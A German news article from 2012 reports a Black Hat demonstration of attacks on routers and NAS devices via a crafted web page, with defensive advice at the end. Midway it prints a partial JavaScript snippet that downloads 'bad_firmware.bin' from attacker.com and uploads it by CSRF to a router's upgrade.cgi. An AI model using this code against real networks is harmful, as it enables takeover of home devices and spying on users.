Sicherheit

Massenhafte Infektionen von Routern und NAS

von - 31.07.2012
Massenhafte Infektionen von Routern und NAS
Auf der Black Hat Konferenz demonstrierten Sicherheitsexperten, wie sich Angriffe auf Router, NAS und andere Netzwerkgeräte durchführen lassen. Dafür genügt eine präparierte Webseite.
Netzwerkgeräte wie Router, Drucker, NAS und Scanner sind in der Regel durch die Firewall gut von der Außenwelt abgeschottet. Der Zugriff ist meist nur über das lokale Netzwerk aber nicht über das Internet möglich. Wer den Fernzugriff auf die Geräte erlaubt, hat hoffentlich ein ausreichend sicheres Passwort vergeben und damit das Risiko eines erfolgreichen Angriffs minimiert. Ist das Gerät dagegen ohnehin nur über das lokale Netzwerk erreichbar, verzichten die Nutzer oft auf eine Absicherung und belassen das Standard-Passwort oder vergeben überhaupt kein Passwort. Netzwerkdrucker sind meist frei zugänglich und sogar die Firmware lässt sich über das Netz verändern, wie Ende 2011 die Sicherheitslücken bei einigen HP LaserJet-Drucker gezeigt haben.
Angriff auf RouterAuf der Black Hat Konferenz in Las Vegas zeigten die Experten Phil Purviance und Joshua Brashars von AppSec Consulting, wie sich ein Router ohne Wissen des Nutzers mit einer neuen Firmware bestücken lässt. Dazu muss das potentielle Opfer nur eine speziell präparierte Webseite aufrufen. Per JavaScript lassen sich dann die Geräte im lokalen Netzwerk ermitteln. Spezielle URLs wie „http://freenas.local“, über die NAS oder Router im Netz erreichbar sind, erleichtern das Vorhaben und lassen Rückschlüsse auf das verwendete Modell oder das Betriebssystem zu. Danach erfolgt ein Brute-Force-Angriff, um einen Zugang zum Gerät zu erlangen. Sollte der Benutzer das Standard-Passwort oder nur ein einfaches Passwort verwenden, ist das eine Sache von Sekunden. Anschließend kann der Angreifer eine neue Firmware auf das Gerät laden. Danach stehen ihm alle Möglichkeiten offen. Er kann den Netzwerkverkehr ausspionieren, DNS-Einträger ändern oder Schadsoftware auf die PCs transportieren.
Werkzeuge des Angreifers
Bisher war es schwierig, über JavaScript auf lokale Netzwerkressourcen zuzugreifen oder Dateien auf einen Router hochzuladen (CSRF, Cross-Site Request Forgery). Mit HTML5 hat sich das aber geändert. Das folgende Script demonstriert, wie sich eine neue Firmaware etwa auf einen Router hochladen lässt:
function fileUpload() {
x = new XMLHttpRequest;
x.open("get", "//attacker.com/bad_firmware.bin"); x.overrideMimeType("text/plain; charset=x-user-defined");
x.send();
x.onreadystatechange = function() { ...
xhr = new XMLHttpRequest;
xhr.open("POST", "http://192.168.1.1/upgrade.cgi", true);
xhr.withCredentials = "true";
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary= --x" );
... xhr.sendAsBinary(body);
}
}
Für die Spionage im Netzwerk stehen den Angreifern inzwischen zahlreiche Tools zur Verfügung. Mit JS-Recon etwa ist es möglich, das Netzwerk nach lokalen IP-Adressen abzusuchen und offene Ports zu finden. Jslanscanner enthält eine leicht erweiterbare Datenbank mit zurzeit etwa 200 Geräten, über die sich das Router-Modell ermitteln lässt. Mit diesen Informationen ist es kein großes Problem, Angriffe auf lokale Netzwerkressourcen durchzuführen.
So können Sie sich schützen: Virenscanner müssen bei derartigen Angriffen zurzeit noch tatenlos zusehen. Denn damit werden nur Dateien auf dem PC oder Smartphone nicht aber auf Routern, Druckern oder NAS-Geräten geprüft. Die wichtigste Vorsichtsmaßnahme ist daher in jedem Fall, das Standard-Passwort des Routers oder NAS zu ändern und ein ausreichend komplexes Passwort zu vergeben.
Mehr Sicherheit ist erst in Zukunft zu erwarten, wenn die Geräte- und Browserhersteller den Vorschlägen der Experten von AppSec Consulting nachkommen. So sollten Seiten aus dem Internet über den Browser nicht auf lokale IP-Adressen und lokale Netzwerkressourcen zugreifen dürfen. JavaScripts dürften im Browser nicht mehr ohne weiteres ausgeführt werden, sondern müssten wie Browser-Plugins einen gewissen Sicherheitsstandard erfüllen. Gerätehersteller sollten außerdem dafür sorgen, dass Firmware digital signiert ist und sich nur nach einer Bestätigung durch den Nutzer, beispielsweise über einen Schalter am Gerät, aktualisieren lässt.
Verwandte Themen